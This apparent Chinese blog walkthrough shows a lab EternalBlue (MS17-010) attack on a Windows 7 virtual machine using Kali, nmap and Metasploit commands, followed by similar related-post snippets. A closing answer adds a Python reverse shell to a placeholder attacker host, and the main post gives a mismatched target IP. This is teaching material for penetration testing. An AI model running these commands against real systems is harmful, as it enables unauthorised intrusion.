Kali 使用永恒之蓝Eternalblue攻击win7

最新推荐文章于 2025-10-10 17:20:16 发布
原创 最新推荐文章于 2025-10-10 17:20:16 发布 · 6.2k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #渗透测试 #安全

本文介绍如何使用Kali Linux通过EternalBlue漏洞对Windows 7系统进行渗透测试。实验中关闭了目标系统的防火墙并开放445和139端口,使用Metasploit框架的ms17_010_eternalblue模块发起攻击,最终成功获取Meterpreter会话。

kali Eternalblue to win7

 实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
 实验过程
 关闭win7防火墙,开放445,139端口
 扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
 启动msfconsole
$ msfconsole

在这里插入图片描述

 使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述

主机很有可能具有ms17-010的漏洞,可攻击

 开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run

 成功
在这里插入图片描述
欢迎交流指正!

kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
08-26 3437
两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标靶机;如下图,可以发现:目标win7系统的445端口开启,可以使用永恒之蓝漏洞攻击 Kali终端输入msfconsole,启动msfconsole;如下图,启动画面每次都一样 图...
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1341
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
kali攻击blue(win7)靶机
weixin_50339832的博客
12-28 4865
目录1.找到目标靶机2.进行漏洞探测,识别服务3.漏洞识别与发现1)探测永恒之蓝漏洞2)进行漏洞利用,获取权限3)在目标靶机写入一个文件 配置blue IP地址(需要和kali处于同一网段,但最后一位相同) KALI的主机IP地址为:192.168.179.128(用root) 在KALI中ping通blue的地址,出现time即成功 1.找到目标靶机 nmap -p 445 192.168.179.0/24 Nmap scan report for 192.168.179.1 Host is up (
kail利用msf工具对ms11-003漏洞入侵渗透Win7
qq_50854662的博客
05-26 2458
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.29.134 步骤: 1、在kali里面打开metasploit漏洞利用框架 2、搜索ms11-003漏洞利用模块 3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import 4、设置payload set pay...
打造一台kali nethunter系统手机,享受随时随地做渗透!记一次个人的全套配置流程
最新发布
mezzo47的博客
10-10 1105
笔者一般也会折腾一些别的设备,但习惯写博客,过这个主题的内容笔者有想法留个记录,一方面方便自身回顾,一方面也为其他想了解的人提供建议
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 1306
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用的漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用的漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 3840
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
利用漏洞永恒之蓝ms17-010对win7目标进行渗透
ABABC1234的博客
07-06 1392
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者要利用技术做违法的事情,然真的会很刑!!!
内网渗透-利用frp代理流量后msf攻击内网永恒之蓝漏洞(ms17-010)-永恒之蓝利用失败的原因
热门推荐
weixin_42109829的博客
01-18 1万+
0x01 前言 当我们进内网的的时候,会遇到永恒之蓝这种漏洞,之前懂代理的时候,总是找到怎么利用,等到我学会了流量代理,frp等工具,才慢慢理解各种协议,各种流量方式的通信方式。 初级–》frp代理了解 进阶–》多层代理 0x02 靶场环境 靶场搭建 0x03 frp简易配置 frp 的配置分为两部分,一个是在公网的vps 运行的 frps 程序 一个是在内网运行的frpc 程序, 下载地址 https://github.com/fatedier/frp/releases/tag/v0.38.0 一、
Kali:永恒之蓝(最基础的攻击指令)
2201_75638644的博客
03-10 668
Kali中利用永痕之蓝漏洞实现最基本对目标靶机的攻击
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 3190
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 4230
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
Kali使用msf利用漏洞永恒之蓝渗透测win7
2301_76361674的博客
05-01 1118
声明!!!!声明!!!!只用于靶机测试!!!
Kali渗透工具-Metasploit攻击windows(永恒之蓝)全流程
Mrsbroken的博客
10-16 2306
使用模块 ->配置模块必选项 ->运行模块使用命令 msfconsole 打开msf使用命令搜索永恒之蓝的编号(ms17_010)这是一个漏洞利用模块,用于远程执行代码。它利用了 MS17-010 漏洞,该漏洞存在于 Windows SMB 服务中,允许攻击者在未授权的情况下远程执行代码。这个模块通常用于渗透测试安全评估,以检测和利用目标系统的漏洞。这也是一个利用 MS17-010 漏洞的模块,但主要用于在目标系统上执行进程。
【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
Kali Linux:用永恒之蓝Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 6324
提示:本文章内所有内容环境为自己搭建绝无违法内容,请要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作
weixin_60182338的博客
03-17 3454
渗透测试仅用于个人的学习以提升能力,能用于非法的恶意攻击
永恒之蓝(ms17-010)复现对win7win server2008 R2渗透
Lzcsfg的博客
04-10 2484
在虚拟机中安装关闭win7win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
漏洞复现永恒之蓝MS-17010+修复
BROTHERYY的博客
08-20 1799
攻击机:192.168.20.101 靶机:192.168.20.103 使用msf的扫描模块,扫描靶机是否存在漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103 run 使用攻击载荷进行攻击 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.20.10
永恒之蓝复现使用win7迅即
03-17
### 复现永恒之蓝漏洞的过程 为了在 Windows 7 系统上成功复现 MS17-010 永恒之蓝漏洞,可以按照以下方法操作。此过程涉及 Metasploit 工具的使用以及目标系统的配置。 #### 使用 Metasploit 进行漏洞利用 Metasploit 是一种功能强大的渗透测试框架,能够快速实现已知漏洞的验证和利用[^3]。以下是具体的操作说明: 1. **确认目标环境** 需要确保目标系统运行的是未修补的 Windows 7 或 Server 2008 R2 版本,并且开启了 SMB 协议服务。此外,目标主机应存在 ms17_010 漏洞[^1]。 2. **启动 Kali Linux 并加载 Metasploit Framework** 在攻击机上安装并启动最新的 Kali Linux 发行版,打开终端输入 `msfconsole` 启动 Metasploit 控制台。 3. **选择模块与设置参数** 输入命令如下以加载针对 MS17-010 的 exploit 模块: ```bash use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP地址> set LPORT <本地监听端口, 默认4444> set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 4. **执行漏洞利用** 当所有必要选项都设定完毕之后,通过下面这条指令触发实际攻击行为: ```bash run ``` 如果一切正常,则会在控制台上看到 Meterpreter shell 成功连接到受害者的提示信息。 #### 构建自定义 Shellcode (可选) 对于深入学习目的而言,还可以尝试手动编写或调整 payload 来理解其工作原理。例如,在 Python 中创建简单的 TCP 反弹 shell 如下所示: ```python import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("attacker_ip",port)) [os.dup2(s.fileno(),fd)for fd in(0,1,2)] subprocess.call(["/bin/sh","-i"]) ``` 上述脚本仅为演示用途,请勿非法使用! --- ### 注意事项 尽管技术研究很重要,但在未经授权的情况下对任何网络设备发起攻击都是违法行为。务必获得适当许可后再开展此类实验活动。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值